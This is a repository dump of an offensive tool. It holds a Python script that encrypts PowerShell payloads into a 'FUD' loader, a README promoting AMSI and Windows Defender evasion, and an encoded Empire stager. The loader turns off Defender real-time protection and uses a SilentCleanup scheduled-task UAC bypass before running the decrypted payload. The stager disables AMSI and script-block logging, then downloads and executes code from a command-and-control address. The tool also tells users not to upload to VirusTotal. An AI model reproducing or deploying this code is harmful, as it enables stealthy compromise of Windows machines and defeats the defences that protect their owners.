├── Fernpshell_obfus.py
├── README.md
└── vampirehack.ps1
/Fernpshell_obfus.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | # coding: latin-1
3 | #@Author :#TheEyeOfCyber&BuckeyeSecurity
4 |
5 | from cryptography.fernet import Fernet
6 | import os
7 | import sys
8 | import random
9 | import time
10 | import subprocess
11 |
12 | class bcolors:
13 | BLUE = '\033[94m'
14 | GREEN = '\033[92m'
15 | WARNING = '\033[93m'
16 | WHITE = '\033[97m'
17 | ERROR = '\033[91m'
18 | ENDC = '\033[0m'
19 | BOLD = '\033[1m'
20 | UNDERLINE = '\033[4m'
21 |
22 |
23 | with open(sys.argv[1], 'r+') as f:
24 | contents = f.read()
25 |
26 | print bcolors.BOLD + bcolors.WHITE + " [+] Author :#Humayun Ali Khan"
27 | print bcolors.BOLD + bcolors.WHITE + " [+] TheEyeOfCyber&BuckeyeSecurity "
28 | print bcolors.BOLD + bcolors.WHITE + " [+] YOUTUBE CHANNEL : https://www.youtube.com/c/TheEyeOfCyberBuckeyeSecurity"
29 | print bcolors.BOLD + bcolors.WHITE + " [+] FACEBOOK : https://www.facebook.com/groups/2641086449498619/"
30 | print bcolors.BOLD + bcolors.WHITE + " [+] LINKEDIN : https://linkedin.com/in/theeyeofcyber"
31 | print bcolors.BOLD + bcolors.WHITE + " [+] GITHUB : https://github.com/TheEyeOfCyber"
32 |
33 | #time.sleep(3)
34 |
35 | print "\n\n\n"
36 |
37 | print bcolors.BOLD + bcolors.WHITE + "[+] This Module will attempt to Obfuscate powershell Attack Vectors"
38 |
39 | print bcolors.BLUE + "[+] Raw payload"
40 | print " ============================================================================================="
41 | print contents
42 | print " ============================================================================================="
43 | print bcolors.ERROR + bcolors.BOLD + "[+] Generating Fernet MultiKey"
44 | key = Fernet.generate_key()
45 | print bcolors.BOLD + bcolors.WHITE + "[+] Key = " + key
46 | print bcolors.WHITE + "[+] Please make note of the Key for decryption"
47 |
48 | print bcolors.BOLD + "[+] Generating Fernet Object....please wait"
49 | f = Fernet(key)
50 | print bcolors.BOLD + bcolors.WHITE + "[+] Fernet Object Generated at :"
51 | print f
52 | print bcolors.ERROR + bcolors.BOLD + "[+] Encrypting Payload"
53 | time.sleep(2)
54 | print bcolors.BOLD + bcolors.WHITE + "================================================================================="
55 | enc_payload = f.encrypt(contents)
56 | print bcolors.BOLD + bcolors.WHITE + "[+] Encrypted Payload : " + enc_payload
57 | print bcolors.BOLD + bcolors.WHITE + "================================================================================="
58 |
59 | print bcolors.ERROR + bcolors.BOLD + "[+] Writing RAW payload to file, Please wait"
60 | Filename = "_PSRawPayload%i"%random.randint(1,10000000001)+".txt"
61 | #print Filename # bookmark
62 |
63 | f1 = open("_PSRawPayload%i"%random.randint(1,10000000001)+".txt", "a")
64 | f1.write(enc_payload)
65 | f1.close()
66 |
67 | print bcolors.BOLD + bcolors.WHITE + "[+] Raw Encrypted Payload written to :" + f1.name
68 |
69 | print bcolors.BLUE + bcolors.BOLD + "[+] Do You want to continue generating the Executable payload (Y/N)"
70 | decision = str(raw_input("enter Y or N\n"))
71 |
72 | if decision == 'N':
73 | print bcolors.BOLD + bcolors.WHITE + "[+] Have a nice day !!"
74 | print bcolors.BOLD + bcolors.WHITE + "[+] DO NOT UPLOAD TO VIRUSTOTAL !!!"
75 | sys.exit(0)
76 | elif decision == 'Y':
77 |
78 | # Create final Obfuscated Executable Python payload
79 | print bcolors.BOLD + bcolors.WHITE + "[+] Generating Final Obfuscated python Payload, Please wait"
80 | time.sleep(2)
81 | final_payload = open("PSFinalPayload%i"%random.randint(1,10000000001)+".py", "w")
82 | final_payload.write("""
83 | from cryptography.fernet import Fernet
84 | import os
85 | import sys
86 | import subprocess
87 | import time
88 | key = """ + "\'"+key+"\'")
89 | final_payload.write("""
90 | f_obj= Fernet(key)
91 | enc_pay =""" "\'"+enc_payload+"\'")
92 | final_payload.write("""
93 | #Disable Notification
94 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
95 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
96 | #time.sleep(20)
97 | #Disable AV
98 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
99 | time.sleep(90)
100 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()])
101 | time.sleep(90)
102 | #Enable AV
103 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $false -DisableIOAVProtection $false -DisableRealtimeMonitoring $false -DisableScriptScanning $false}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
104 | #Enable notification
105 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
106 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
107 | """)
108 | final_payload.close()
109 | print bcolors.BOLD + bcolors.WHITE + "[+] Final Encrypted encrypted Powershell Python Payload written to : " + final_payload.name
110 | print bcolors.BLUE + bcolors.BOLD + "[+] HACK THE MULTIVERSE "
111 | decr = 5
112 | while True:
113 | print bcolors.ERROR + bcolors.BOLD + "[+] DO NOT UPLOAD TO VIRUSTOTAL"
114 | decr = decr-1
115 | if(decr <=0):
116 | break
117 | sys.exit(0)
118 | else:
119 | sys.exit(0)
120 | print bcolors.ERROR + bcolors.BOLD + "[+] Respond in Y or N ONLY"
121 | sys.exit(0)
122 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Powershell_Fernet_Obfuscator
2 | A python Code to obfuscate any non-fud Powershell payload and generate a ready to use FUD Python executable script
3 |
4 | Powershell_Fernet_Obfuscator
5 |
6 | This is a tool to Obfuscate any existing powershell non fud payload(empire,unicorn,SET PS vector) and , in the process will create a FUD python ready to use script
7 | that can be used to perform different tasks.
8 |
9 | In this Example I have shown how a non Fud Empire PS payload reverse shell , can be obfuscated to bypass AMSI.dll check and evade Windows defender .
10 | Virustotal detection results : https://www.virustotal.com/gui/file/8b9ec6a026f49d4db1d89f6f5060857eb335a8decbd04642a13c28220600aac3/detection
11 |
--------------------------------------------------------------------------------
/vampirehack.ps1:
--------------------------------------------------------------------------------
1 | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBpAE8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AQQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAWQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBMAD0AWwBDAE8ATABMAEUAQwBUAGkAbwBuAFMALgBHAEUAbgBFAFIAaQBjAC4ARABJAGMAdABpAE8ATgBhAFIAeQBbAFMAdAByAGkAbgBnACwAUwB5AHMAVABFAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBBAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAYwByAGkAcAB0AEIAbABPAGMASwBdAC4AIgBHAEUAVABGAGkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAVQBFACgAJABuAHUAbABsACwAKABOAEUAVwAtAE8AQgBqAEUAQwB0ACAAQwBvAEwATABlAGMAdABpAG8ATgBTAC4ARwBlAG4AZQByAGkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAUgBpAE4AZwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAcwBTAGUAbQBiAEwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AEUAKAAkAG4AVQBMAEwALAAkAFQAcgB1AGUAKQB9ADsAfQA7AFsAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFMAZQBSAHYAaQBjAEUAUABvAGkATgBUAE0AQQBOAGEAZwBlAFIAXQA6ADoARQB4AFAAZQBDAHQAMQAwADAAQwBvAE4AdABJAE4AVQBFAD0AMAA7ACQAdwBDAD0ATgBlAFcALQBPAEIAagBFAGMAVAAgAFMAeQBzAFQARQBNAC4ATgBlAHQALgBXAEUAYgBDAGwASQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBhAGQARQByAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAUgBPAFgAeQA9AFsAUwB5AHMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAFUARQBTAFQAXQA6ADoARABlAEYAQQB1AEwAdABXAEUAYgBQAHIAbwBYAFkAOwAkAFcAYwAuAFAAUgBvAFgAWQAuAEMAUgBlAGQAZQBuAHQASQBhAEwAUwAgAD0AIABbAFMAWQBTAHQARQBtAC4ATgBFAHQALgBDAFIARQBEAGUAbgB0AEkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQBUAFcATwByAGsAQwBSAEUAZABFAG4AVABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAVABlAE0ALgBUAEUAeABUAC4ARQBuAEMATwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAGUAUwAoACcAZQA1ADgANwBmADYAMQA0ADYAZQBiAGYAYgBkAGUAZgBkAGMAMAAyADgAYwA1ADkAMQA2ADQAMwBmADIAMgAwACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgA1AC4AMQA5ADUAOgA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAHcAQwAuAEgAZQBBAEQARQBSAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AG4AKwBXAEMAVwBsAFgAQgBLAEcAdABoADMAaQB2AFIAWQBxAEoARwBGACsAawBGAEQAUQBvAD0AIgApADsAJABkAEEAVABBAD0AJABXAEMALgBEAG8AdwBOAEwAbwBBAGQARABhAHQAQQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABEAEEAdABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABEAEEAVABhAFsANAAuAC4AJABkAEEAVABhAC4AbABlAG4ARwBUAGgAXQA7AC0ASgBPAEkATgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
2 |
--------------------------------------------------------------------------------